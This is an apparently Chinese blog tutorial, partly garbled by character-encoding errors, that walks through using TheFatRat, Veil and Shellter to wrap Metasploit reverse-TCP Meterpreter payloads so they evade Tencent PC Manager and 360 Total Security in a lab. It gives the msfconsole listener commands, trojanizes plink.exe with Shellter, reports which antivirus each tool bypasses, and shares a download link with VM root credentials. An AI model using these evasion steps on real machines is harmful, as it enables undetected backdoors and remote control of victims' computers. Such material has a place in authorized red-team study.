前言
在滲透測試中經常遇到有殺毒的軟件,不會代碼層的我只能尋找?guī)卓畈诲e的免殺工具。進行傻瓜式配置。這里推薦三款免殺工具(親測有效)
實驗環(huán)境
windows 7 (安裝電腦管家)(IP:192.168.72.154)
kali (IP:192.168.72.173)
windows 10 (360安全衛(wèi)士)(IP:192.168.72.1)
TheFatRat工具
安裝
參考資料:Msfvenom傻瓜化后門生成工具
安裝過程不算麻煩。我這里已經安裝好啦。
使用
選擇生成bat文件,聽說可以過360。
選擇經常使用的payload,和metasploit保持一致。
這里會生成bat文件。該代碼為bat源碼。
將生成的kali.bat文件剪貼到windows7靶機上進行測試。
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 5555
set lhost 192.168.72.173
經測試發(fā)現可以電腦管家沒有報毒,但無法繞過360安全衛(wèi)士。
Veil工具
安裝
veil-evasion工具安裝起來比較麻煩,我也是安裝好久也裝上的。但依然存在問題。
如果感覺安裝過程太繁瑣,可以去云盤上下載直接使用。
下載地址見頁尾
這里推薦veil3.1版本的安裝教程:Veil3.1免殺安裝
使用
選擇C語言編寫的payload。
進行必要的配置。
生成文件的信息。
將生成文件kali.exe剪切到windows7下進行測試。
依然是繞過電腦管家,無法繞過360。
在嘗試使用 python/shellcode_inject/aes_encrypt
模塊時出現了錯誤,無法進行有效免殺
Shellter工具
安裝
Kali Shellter 5.1:動態(tài)ShellCode注入工具 繞過安全軟件
我并沒有git下來進行安裝,而是使用的命令
apt-get install shellter
應用
PE目標為plink.exe
cp /usr/share/windows-binaries/plink.exe /root
依然是選擇熟悉的reverse_tcp,進行一些配置即可。
將生成的文件剪切到windows下。
在windows10通過cmd運行plink.exe
plink.exe 192.168.72.173
更多的使用方法--help
同樣的配置。
成功得到session會話,且沒有被360安全衛(wèi)士攔截。
附加:
我這里把安裝好的環(huán)境克隆出來了。下載后只需要打來虛擬機運行即可。
用戶名root,密碼123456..
百度云盤
https://pan.baidu.com/s/1P9dOiSncPga2lBeZ4xxxdg
提取碼: xc37